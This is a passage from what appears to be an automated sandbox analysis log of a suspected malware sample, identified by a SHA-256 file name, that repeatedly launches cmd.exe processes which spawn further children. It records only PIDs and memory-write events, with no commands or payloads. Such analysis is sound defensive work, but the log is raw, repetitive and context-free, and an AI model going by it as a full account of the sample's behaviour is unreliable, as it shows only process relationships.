memory of 1072 432 cmd.exe 356 PID 432 wrote to memory of 1028 432 cmd.exe 357 PID 432 wrote to memory of 1028 432 cmd.exe 357 PID 432 wrote to memory of 1028 432 cmd.exe 357 PID 432 wrote to memory of 1028 432 cmd.exe 357 PID 1028 wrote to memory of 1876 1028 cmd.exe 358 PID 1028 wrote to memory of 1876 1028 cmd.exe 358 PID 1028 wrote to memory of 1876 1028 cmd.exe 358 PID 1028 wrote to memory of 1876 1028 cmd.exe 358 PID 432 wrote to memory of 968 432 cmd.exe 359 PID 432 wrote to memory of 968 432 cmd.exe 359 PID 432 wrote to memory of 968 432 cmd.exe 359 PID 432 wrote to memory of 968 432 cmd.exe 359 PID 1460 wrote to memory of 896 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 360 PID 1460 wrote to memory of 896 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 360 PID 1460 wrote to memory of 896 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 360 PID 1460 wrote to memory of 896 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 360 PID 896 wrote to memory of 956 896 cmd.exe 362 PID 896 wrote to memory of 956 896 cmd.exe 362 PID 896 wrote to memory of 956 896 cmd.exe 362 PID 896 wrote to memory of 956 896 cmd.exe 362 PID 896 wrote to memory of 1496 896 cmd.exe 363 PID 896 wrote to memory of 1496 896 cmd.exe 363 PID 896 wrote to memory of 1496 896 cmd.exe 363 PID 896 wrote to memory of 1496 896 cmd.exe 363 PID 896 wrote to memory of 1756 896 cmd.exe 364 PID 896 wrote to memory of 1756 896 cmd.exe 364 PID 896 wrote to memory of 1756 896 cmd.exe 364 PID 896 wrote to memory of 1756 896 cmd.exe 364 PID 1756 wrote to memory of 1000 1756 cmd.exe 365 PID 1756 wrote to memory of 1000 1756 cmd.exe 365 PID 1756 wrote to memory of 1000 1756 cmd.exe 365 PID 1756 wrote to memory of 1000 1756 cmd.exe 365 PID 896 wrote to memory of 1908 896 cmd.exe 366 PID 896 wrote to memory of 1908 896 cmd.exe 366 PID 896 wrote to memory of 1908 896 cmd.exe 366 PID 896 wrote to memory of 1908 896 cmd.exe 366 PID 1460 wrote to memory of 780 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 367 PID 1460 wrote to memory of 780 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 367 PID 1460 wrote to memory of 780 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 367 PID 1460 wrote to memory of 780 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 367 PID 780 wrote to memory of 972 780 cmd.exe 369 PID 780 wrote to memory of 972 780 cmd.exe 369 PID 780 wrote to memory of 972 780 cmd.exe 369 PID 780 wrote to memory of 972 780 cmd.exe 369 PID 780 wrote to memory of 1476 780 cmd.exe 370 PID 780 wrote to memory of 1476 780 cmd.exe 370 PID 780 wrote to memory of 1476 780 cmd.exe 370 PID 780 wrote to memory of 1476 780 cmd.exe 370 PID 780 wrote to memory of 1572 780 cmd.exe 371 PID 780 wrote to memory of 1572 780 cmd.exe 371 PID 780 wrote to memory of 1572 780 cmd.exe 371 PID 780 wrote to memory of 1572 780 cmd.exe 371 PID 1572 wrote to memory of 1704 1572 cmd.exe 372 PID 1572 wrote to memory of 1704 1572 cmd.exe 372 PID 1572 wrote to memory of 1704 1572 cmd.exe 372 PID 1572 wrote to memory of 1704 1572 cmd.exe 372 PID 780 wrote to memory of 880 780 cmd.exe 373 PID 780 wrote to memory of 880 780 cmd.exe 373 PID 780 wrote to memory of 880 780 cmd.exe 373 PID 780 wrote to memory of 880 780 cmd.exe 373 PID 1460 wrote to memory of 1444 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 374 PID 1460 wrote to memory of 1444 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 374 PID 1460 wrote to memory of 1444 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 374 PID 1460 wrote to memory of 1444 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 374 PID 1444 wrote to memory of 1696 1444 cmd.exe 376 PID 1444 wrote to memory of 1696 1444 cmd.exe 376 PID 1444 wrote to memory of 1696 1444 cmd.exe 376 PID 1444 wrote to memory of 1696 1444 cmd.exe 376 PID 1444 wrote to memory of 968 1444 cmd.exe 377 PID 1444 wrote to memory of 968 1444 cmd.exe 377 PID 1444 wrote to memory of 968 1444 cmd.exe 377 PID 1444 wrote to memory of 968 1444 cmd.exe 377 PID 1444 wrote to memory of 1568 1444 cmd.exe 378 PID 1444 wrote to memory of 1568 1444 cmd.exe 378 PID 1444 wrote to memory of 1568 1444 cmd.exe 378 PID 1444 wrote to memory of 1568 1444 cmd.exe 378 PID 1568 wrote to memory of 1480 1568 cmd.exe 379 PID 1568 wrote to memory of 1480 1568 cmd.exe 379 PID 1568 wrote to memory of 1480 1568 cmd.exe 379 PID 1568 wrote to memory of 1480 1568 cmd.exe 379 PID 1444 wrote to memory of 1928 1444 cmd.exe 380 PID 1444 wrote to memory of 1928 1444 cmd.exe 380 PID 1444 wrote to memory of 1928 1444 cmd.exe 380 PID 1444 wrote to memory of 1928 1444 cmd.exe 380 PID 1460 wrote to memory of 1864 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 381 PID 1460 wrote to memory of 1864 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 381 PID 1460 wrote to memory of 1864 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 381 PID 1460 wrote to memory of 1864 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 381 PID 1864 wrote to memory of 676 1864 cmd.exe 383 PID 1864 wrote to memory of 676 1864 cmd.exe 383 PID 1864 wrote to memory of 676 1864 cmd.exe 383 PID 1864 wrote to memory of 676 1864 cmd.exe 383 PID 1864 wrote to memory of 1908 1864 cmd.exe 384 PID 1864 wrote to memory of 1908 1864 cmd.exe 384 PID 1864 wrote to memory of 1908 1864 cmd.exe 384 PID 1864 wrote to memory of 1908 1864 cmd.exe 384 PID 1864 wrote to memory of 556 1864 cmd.exe 385 PID 1864 wrote to memory of 556 1864 cmd.exe 385 PID 1864 wrote to memory of 556 1864 cmd.exe 385 PID 1864 wrote to memory of 556 1864 cmd.exe 385 PID 556 wrote to memory of 816 556 cmd.exe 386 PID 556 wrote to memory of 816 556 cmd.exe 386 PID 556 wrote to memory of 816 556 cmd.exe 386 PID 556 wrote to memory of 816 556 cmd.exe 386 PID 1864 wrote to memory of 972 1864 cmd.exe 387 PID 1864 wrote to memory of 972 1864 cmd.exe 387 PID 1864 wrote to memory of 972 1864 cmd.exe 387 PID 1864 wrote to memory of 972 1864 cmd.exe 387 PID 1460 wrote to memory of 396 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 388 PID 1460 wrote to memory of 396 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 388 PID 1460 wrote to memory of 396 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 388 PID 1460 wrote to memory of 396 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 388 PID 396 wrote to memory of 1572 396 cmd.exe 390 PID 396 wrote to memory of 1572 396 cmd.exe 390 PID 396 wrote to memory of 1572 396 cmd.exe 390 PID 396 wrote to memory of 1572 396 cmd.exe 390 PID 396 wrote to memory of 1912 396 cmd.exe 391 PID 396 wrote to memory of 1912 396 cmd.exe 391 PID 396 wrote to memory of 1912 396 cmd.exe 391 PID 396 wrote to memory of 1912 396 cmd.exe 391 PID 396 wrote to memory of 1316 396 cmd.exe 392 PID 396 wrote to memory of 1316 396 cmd.exe 392 PID 396 wrote to memory of 1316 396 cmd.exe 392 PID 396 wrote to memory of 1316 396 cmd.exe 392 PID 1316 wrote to memory of 1820 1316 cmd.exe 393 PID 1316 wrote to memory of 1820 1316 cmd.exe 393 PID 1316 wrote to memory of 1820 1316 cmd.exe 393 PID 1316 wrote to memory of 1820 1316 cmd.exe 393 PID 396 wrote to memory of 744 396 cmd.exe 394 PID 396 wrote to memory of 744 396 cmd.exe 394 PID 396 wrote to memory of 744 396 cmd.exe 394 PID 396 wrote to memory of 744 396 cmd.exe 394 PID 1460 wrote to memory of 968 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 395 PID 1460 wrote to memory of 968 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 395 PID 1460 wrote to memory of 968 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 395 PID 1460 wrote to memory of 968 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 395 PID 968 wrote to memory of 1568 968 cmd.exe 397 PID 968 wrote to memory of 1568 968 cmd.exe 397 PID 968 wrote to memory of 1568 968 cmd.exe 397 PID 968 wrote to memory of 1568 968 cmd.exe 397 PID 968 wrote to memory of 1144 968 cmd.exe 398 PID 968 wrote to memory of 1144 968 cmd.exe 398 PID 968 wrote to memory of 1144 968 cmd.exe 398 PID 968 wrote to memory of 1144 968 cmd.exe 398 PID 968 wrote to memory of 1676 968 cmd.exe 399 PID 968 wrote to memory of 1676 968 cmd.exe 399 PID 968 wrote to memory of 1676 968 cmd.exe 399 PID 968 wrote to memory of 1676 968 cmd.exe 399 PID 1676 wrote to memory of 1624 1676 cmd.exe 400 PID 1676 wrote to memory of 1624 1676 cmd.exe 400 PID 1676 wrote to memory of 1624 1676 cmd.exe 400 PID 1676 wrote to memory of 1624 1676 cmd.exe 400 PID 968 wrote to memory of 560 968 cmd.exe 401 PID 968 wrote to memory of 560 968 cmd.exe 401 PID 968 wrote to memory of 560 968 cmd.exe 401 PID 968 wrote to memory of 560 968 cmd.exe 401 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 402 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 402 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 402 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 402 PID 1908 wrote to memory of 816 1908 cmd.exe 404 PID 1908 wrote to memory of 816 1908 cmd.exe 404 PID 1908 wrote to memory of 816 1908 cmd.exe 404 PID 1908 wrote to memory of 816 1908 cmd.exe 404 PID 1908 wrote to memory of 1476 1908 cmd.exe 405 PID 1908 wrote to memory of 1476 1908 cmd.exe 405 PID 1908 wrote to memory of 1476 1908 cmd.exe 405 PID 1908 wrote to memory of 1476 1908 cmd.exe 405 PID 1908 wrote to memory of 1068 1908 cmd.exe 406 PID 1908 wrote to memory of 1068 1908 cmd.exe 406 PID 1908 wrote to memory of 1068 1908 cmd.exe 406 PID 1908 wrote to memory of 1068 1908 cmd.exe 406 PID 1068 wrote to memory of 1756 1068 cmd.exe 407 PID 1068 wrote to memory of 1756 1068 cmd.exe 407 PID 1068 wrote to memory of 1756 1068 cmd.exe 407 PID 1068 wrote to memory of 1756 1068 cmd.exe 407 PID 1908 wrote to memory of 208 1908 cmd.exe 408 PID 1908 wrote to memory of 208 1908 cmd.exe 408 PID 1908 wrote to memory of 208 1908 cmd.exe 408 PID 1908 wrote to memory of 208 1908 cmd.exe 408 PID 1460 wrote to memory of 1912 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 409 PID 1460 wrote to memory of 1912 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 409 PID 1460 wrote to memory of 1912 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 409 PID 1460 wrote to memory of 1912 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 409 PID 1912 wrote to memory of 780 1912 cmd.exe 411 PID 1912 wrote to memory of 780 1912 cmd.exe 411 PID 1912 wrote to memory of 780 1912 cmd.exe 411 PID 1912 wrote to memory of 780 1912 cmd.exe 411 PID 1912 wrote to memory of 1256 1912 cmd.exe 412 PID 1912 wrote to memory of 1256 1912 cmd.exe 412 PID 1912 wrote to memory of 1256 1912 cmd.exe 412 PID 1912 wrote to memory of 1256 1912 cmd.exe 412 PID 1912 wrote to memory of 940 1912 cmd.exe 413 PID 1912 wrote to memory of 940 1912 cmd.exe 413 PID 1912 wrote to memory of 940 1912 cmd.exe 413 PID 1912 wrote to memory of 940 1912 cmd.exe 413 PID 940 wrote to memory of 1704 940 cmd.exe 414 PID 940 wrote to memory of 1704 940 cmd.exe 414 PID 940 wrote to memory of 1704 940 cmd.exe 414 PID 940 wrote to memory of 1704 940 cmd.exe 414 PID 1912 wrote to memory of 1780 1912 cmd.exe 415 PID 1912 wrote to memory of 1780 1912 cmd.exe 415 PID 1912 wrote to memory of 1780 1912 cmd.exe 415 PID 1912 wrote to memory of 1780 1912 cmd.exe 415 PID 1460 wrote to memory of 1144 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 416 PID 1460 wrote to memory of 1144 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 416 PID 1460 wrote to memory of 1144 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 416 PID 1460 wrote to memory of 1144 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 416 PID 1144 wrote to memory of 1676 1144 cmd.exe 418 PID 1144 wrote to memory of 1676 1144 cmd.exe 418 PID 1144 wrote to memory of 1676 1144 cmd.exe 418 PID 1144 wrote to memory of 1676 1144 cmd.exe 418 PID 1144 wrote to memory of 904 1144 cmd.exe 419 PID 1144 wrote to memory of 904 1144 cmd.exe 419 PID 1144 wrote to memory of 904 1144 cmd.exe 419 PID 1144 wrote to memory of 904 1144 cmd.exe 419 PID 1144 wrote to memory of 1480 1144 cmd.exe 420 PID 1144 wrote to memory of 1480 1144 cmd.exe 420 PID 1144 wrote to memory of 1480 1144 cmd.exe 420 PID 1144 wrote to memory of 1480 1144 cmd.exe 420 PID 1480 wrote to memory of 432 1480 cmd.exe 421 PID 1480 wrote to memory of 432 1480 cmd.exe 421 PID 1480 wrote to memory of 432 1480 cmd.exe 421 PID 1480 wrote to memory of 432 1480 cmd.exe 421 PID 1144 wrote to memory of 1224 1144 cmd.exe 422 PID 1144 wrote to memory of 1224 1144 cmd.exe 422 PID 1144 wrote to memory of 1224 1144 cmd.exe 422 PID 1144 wrote to memory of 1224 1144 cmd.exe 422 PID 1460 wrote to memory of 1476 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 423 PID 1460 wrote to memory of 1476 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 423 PID 1460 wrote to memory of 1476 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 423 PID 1460 wrote to memory of 1476 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 423 PID 1476 wrote to memory of 1992 1476 cmd.exe 425 PID 1476 wrote to memory of 1992 1476 cmd.exe 425 PID 1476 wrote to memory of 1992 1476 cmd.exe 425 PID 1476 wrote to memory of 1992 1476 cmd.exe 425 PID 1476 wrote to memory of 880 1476 cmd.exe 426 PID 1476 wrote to memory of 880 1476 cmd.exe 426 PID 1476 wrote to memory of 880 1476 cmd.exe 426 PID 1476 wrote to memory of 880 1476 cmd.exe 426 PID 1476 wrote to memory of 1752 1476 cmd.exe 427 PID 1476 wrote to memory of 1752 1476 cmd.exe 427 PID 1476 wrote to memory of 1752 1476 cmd.exe 427 PID 1476 wrote to memory of 1752 1476 cmd.exe 427 PID 1752 wrote to memory of 1836 1752 cmd.exe 428 PID 1752 wrote to memory of 1836 1752 cmd.exe 428 PID 1752 wrote to memory of 1836 1752 cmd.exe 428 PID 1752 wrote to memory of 1836 1752 cmd.exe 428 PID 1476 wrote to memory of 1316 1476 cmd.exe 429 PID 1476 wrote to memory of 1316 1476 cmd.exe 429 PID 1476 wrote to memory of 1316 1476 cmd.exe 429 PID 1476 wrote to memory of 1316 1476 cmd.exe 429 PID 1460 wrote to memory of 1256 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 430 PID 1460 wrote to memory of 1256 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 430 PID 1460 wrote to memory of 1256 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 430 PID 1460 wrote to memory of 1256 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 430 PID 1256 wrote to memory of 940 1256 cmd.exe 432 PID 1256 wrote to memory of 940 1256 cmd.exe 432 PID 1256 wrote to memory of 940 1256 cmd.exe 432 PID 1256 wrote to memory of 940 1256 cmd.exe 432 PID 1256 wrote to memory of 204 1256 cmd.exe 433 PID 1256 wrote to memory of 204 1256 cmd.exe 433 PID 1256 wrote to memory of 204 1256 cmd.exe 433 PID 1256 wrote to memory of 204 1256 cmd.exe 433 PID 1256 wrote to memory of 960 1256 cmd.exe 434 PID 1256 wrote to memory of 960 1256 cmd.exe 434 PID 1256 wrote to memory of 960 1256 cmd.exe 434 PID 1256 wrote to memory of 960 1256 cmd.exe 434 PID 960 wrote to memory of 1380 960 cmd.exe 435 PID 960 wrote to memory of 1380 960 cmd.exe 435 PID 960 wrote to memory of 1380 960 cmd.exe 435 PID 960 wrote to memory of 1380 960 cmd.exe 435 PID 1256 wrote to memory of 676 1256 cmd.exe 436 PID 1256 wrote to memory of 676 1256 cmd.exe 436 PID 1256 wrote to memory of 676 1256 cmd.exe 436 PID 1256 wrote to memory of 676 1256 cmd.exe 436 PID 1460 wrote to memory of 904 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 437 PID 1460 wrote to memory of 904 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 437 PID 1460 wrote to memory of 904 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 437 PID 1460 wrote to memory of 904 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 437 PID 904 wrote to memory of 800 904 cmd.exe 439 PID 904 wrote to memory of 800 904 cmd.exe 439 PID 904 wrote to memory of 800 904 cmd.exe 439 PID 904 wrote to memory of 800 904 cmd.exe 439 PID 904 wrote to memory of 816 904 cmd.exe 440 PID 904 wrote to memory of 816 904 cmd.exe 440 PID 904 wrote to memory of 816 904 cmd.exe 440 PID 904 wrote to memory of 816 904 cmd.exe 440 PID 904 wrote to memory of 1028 904 cmd.exe 441 PID 904 wrote to memory of 1028 904 cmd.exe 441 PID 904 wrote to memory of 1028 904 cmd.exe 441 PID 904 wrote to memory of 1028 904 cmd.exe 441 PID 1028 wrote to memory of 1624 1028 cmd.exe 442 PID 1028 wrote to memory of 1624 1028 cmd.exe 442 PID 1028 wrote to memory of 1624 1028 cmd.exe 442 PID 1028 wrote to memory of 1624 1028 cmd.exe 442 PID 904 wrote to memory of 1572 904 cmd.exe 443 PID 904 wrote to memory of 1572 904 cmd.exe 443 PID 904 wrote to memory of 1572 904 cmd.exe 443 PID 904 wrote to memory of 1572 904 cmd.exe 443 PID 1460 wrote to memory of 880 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 444 PID 1460 wrote to memory of 880 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 444 PID 1460 wrote to memory of 880 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 444 PID 1460 wrote to memory of 880 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 444 PID 880 wrote to memory of 896 880 cmd.exe 446 PID 880 wrote to memory of 896 880 cmd.exe 446 PID 880 wrote to memory of 896 880 cmd.exe 446 PID 880 wrote to memory of 896 880 cmd.exe 446 PID 880 wrote to memory of 1696 880 cmd.exe 447 PID 880 wrote to memory of 1696 880 cmd.exe 447 PID 880 wrote to memory of 1696 880 cmd.exe 447 PID 880 wrote to memory of 1696 880 cmd.exe 447 PID 880 wrote to memory of 1756 880 cmd.exe 448 PID 880 wrote to memory of 1756 880 cmd.exe 448 PID 880 wrote to memory of 1756 880 cmd.exe 448 PID 880 wrote to memory of 1756 880 cmd.exe 448 PID 1756 wrote to memory of 1864 1756 cmd.exe 449 PID 1756 wrote to memory of 1864 1756 cmd.exe 449 PID 1756 wrote to memory of 1864 1756 cmd.exe 449 PID 1756 wrote to memory of 1864 1756 cmd.exe 449 PID 880 wrote to memory of 1568 880 cmd.exe 450 PID 880 wrote to memory of 1568 880 cmd.exe 450 PID 880 wrote to memory of 1568 880 cmd.exe 450 PID 880 wrote to memory of 1568 880 cmd.exe 450 PID 1460 wrote to memory of 204 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 451 PID 1460 wrote to memory of 204 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 451 PID 1460 wrote to memory of 204 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 451 PID 1460 wrote to memory of 204 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 451 PID 204 wrote to memory of 1264 204 cmd.exe 453 PID 204 wrote to memory of 1264 204 cmd.exe 453 PID 204 wrote to memory of 1264 204 cmd.exe 453 PID 204 wrote to memory of 1264 204 cmd.exe 453 PID 204 wrote to memory of 560 204 cmd.exe 454 PID 204 wrote to memory of 560 204 cmd.exe 454 PID 204 wrote to memory of 560 204 cmd.exe 454 PID 204 wrote to memory of 560 204 cmd.exe 454 PID 204 wrote to memory of 1988 204 cmd.exe 455 PID 204 wrote to memory of 1988 204 cmd.exe 455 PID 204 wrote to memory of 1988 204 cmd.exe 455 PID 204 wrote to memory of 1988 204 cmd.exe 455 PID 1988 wrote to memory of 1260 1988 cmd.exe 456 PID 1988 wrote to memory of 1260 1988 cmd.exe 456 PID 1988 wrote to memory of 1260 1988 cmd.exe 456 PID 1988 wrote to memory of 1260 1988 cmd.exe 456 PID 204 wrote to memory of 1824 204 cmd.exe 457 PID 204 wrote to memory of 1824 204 cmd.exe 457 PID 204 wrote to memory of 1824 204 cmd.exe 457 PID 204 wrote to memory of 1824 204 cmd.exe 457 PID 1460 wrote to memory of 1480 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 458 PID 1460 wrote to memory of 1480 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 458 PID 1460 wrote to memory of 1480 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 458 PID 1460 wrote to memory of 1480 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 458 PID 1480 wrote to memory of 992 1480 cmd.exe 460 PID 1480 wrote to memory of 992 1480 cmd.exe 460 PID 1480 wrote to memory of 992 1480 cmd.exe 460 PID 1480 wrote to memory of 992 1480 cmd.exe 460 PID 1480 wrote to memory of 1876 1480 cmd.exe 461 PID 1480 wrote to memory of 1876 1480 cmd.exe 461 PID 1480 wrote to memory of 1876 1480 cmd.exe 461 PID 1480 wrote to memory of 1876 1480 cmd.exe 461 PID 1480 wrote to memory of 208 1480 cmd.exe 462 PID 1480 wrote to memory of 208 1480 cmd.exe 462 PID 1480 wrote to memory of 208 1480 cmd.exe 462 PID 1480 wrote to memory of 208 1480 cmd.exe 462 PID 208 wrote to memory of 1072 208 cmd.exe 463 PID 208 wrote to memory of 1072 208 cmd.exe 463 PID 208 wrote to memory of 1072 208 cmd.exe 463 PID 208 wrote to memory of 1072 208 cmd.exe 463 PID 1480 wrote to memory of 304 1480 cmd.exe 464 PID 1480 wrote to memory of 304 1480 cmd.exe 464 PID 1480 wrote to memory of 304 1480 cmd.exe 464 PID 1480 wrote to memory of 304 1480 cmd.exe 464 PID 1460 wrote to memory of 1752 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 465 PID 1460 wrote to memory of 1752 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 465 PID 1460 wrote to memory of 1752 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 465 PID 1460 wrote to memory of 1752 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 465 PID 1752 wrote to memory of 1800 1752 cmd.exe 467 PID 1752 wrote to memory of 1800 1752 cmd.exe 467 PID 1752 wrote to memory of 1800 1752 cmd.exe 467 PID 1752 wrote to memory of 1800 1752 cmd.exe 467 PID 1752 wrote to memory of 1756 1752 cmd.exe 468 PID 1752 wrote to memory of 1756 1752 cmd.exe 468 PID 1752 wrote to memory of 1756 1752 cmd.exe 468 PID 1752 wrote to memory of 1756 1752 cmd.exe 468 PID 1752 wrote to memory of 956 1752 cmd.exe 469 PID 1752 wrote to memory of 956 1752 cmd.exe 469 PID 1752 wrote to memory of 956 1752 cmd.exe 469 PID 1752 wrote to memory of 956 1752 cmd.exe 469 PID 956 wrote to memory of 1836 956 cmd.exe 470 PID 956 wrote to memory of 1836 956 cmd.exe 470 PID 956 wrote to memory of 1836 956 cmd.exe 470 PID 956 wrote to memory of 1836 956 cmd.exe 470 PID 1752 wrote to memory of 1812 1752 cmd.exe 471 PID 1752 wrote to memory of 1812 1752 cmd.exe 471 PID 1752 wrote to memory of 1812 1752 cmd.exe 471 PID 1752 wrote to memory of 1812 1752 cmd.exe 471 PID 1460 wrote to memory of 1264 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 472 PID 1460 wrote to memory of 1264 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 472 PID 1460 wrote to memory of 1264 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 472 PID 1460 wrote to memory of 1264 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 472 PID 1264 wrote to memory of 952 1264 cmd.exe 474 PID 1264 wrote to memory of 952 1264 cmd.exe 474 PID 1264 wrote to memory of 952 1264 cmd.exe 474 PID 1264 wrote to memory of 952 1264 cmd.exe 474 PID 1264 wrote to memory of 1988 1264 cmd.exe 475 PID 1264 wrote to memory of 1988 1264 cmd.exe 475 PID 1264 wrote to memory of 1988 1264 cmd.exe 475 PID 1264 wrote to memory of 1988 1264 cmd.exe 475 PID 1264 wrote to memory of 1824 1264 cmd.exe 476 PID 1264 wrote to memory of 1824 1264 cmd.exe 476 PID 1264 wrote to memory of 1824 1264 cmd.exe 476 PID 1264 wrote to memory of 1824 1264 cmd.exe 476 PID 1824 wrote to memory of 972 1824 cmd.exe 477 PID 1824 wrote to memory of 972 1824 cmd.exe 477 PID 1824 wrote to memory of 972 1824 cmd.exe 477 PID 1824 wrote to memory of 972 1824 cmd.exe 477 PID 1264 wrote to memory of 816 1264 cmd.exe 478 PID 1264 wrote to memory of 816 1264 cmd.exe 478 PID 1264 wrote to memory of 816 1264 cmd.exe 478 PID 1264 wrote to memory of 816 1264 cmd.exe 478 PID 1460 wrote to memory of 1992 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 479 PID 1460 wrote to memory of 1992 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 479 PID 1460 wrote to memory of 1992 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 479 PID 1460 wrote to memory of 1992 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 479 PID 1992 wrote to memory of 824 1992 cmd.exe 481 PID 1992 wrote to memory of 824 1992 cmd.exe 481 PID 1992 wrote to memory of 824 1992 cmd.exe 481 PID 1992 wrote to memory of 824 1992 cmd.exe 481 PID 1992 wrote to memory of 828 1992 cmd.exe 482 PID 1992 wrote to memory of 828 1992 cmd.exe 482 PID 1992 wrote to memory of 828 1992 cmd.exe 482 PID 1992 wrote to memory of 828 1992 cmd.exe 482 PID 1992 wrote to memory of 216 1992 cmd.exe 483 PID 1992 wrote to memory of 216 1992 cmd.exe 483 PID 1992 wrote to memory of 216 1992 cmd.exe 483 PID 1992 wrote to memory of 216 1992 cmd.exe 483 PID 216 wrote to memory of 800 216 cmd.exe 484 PID 216 wrote to memory of 800 216 cmd.exe 484 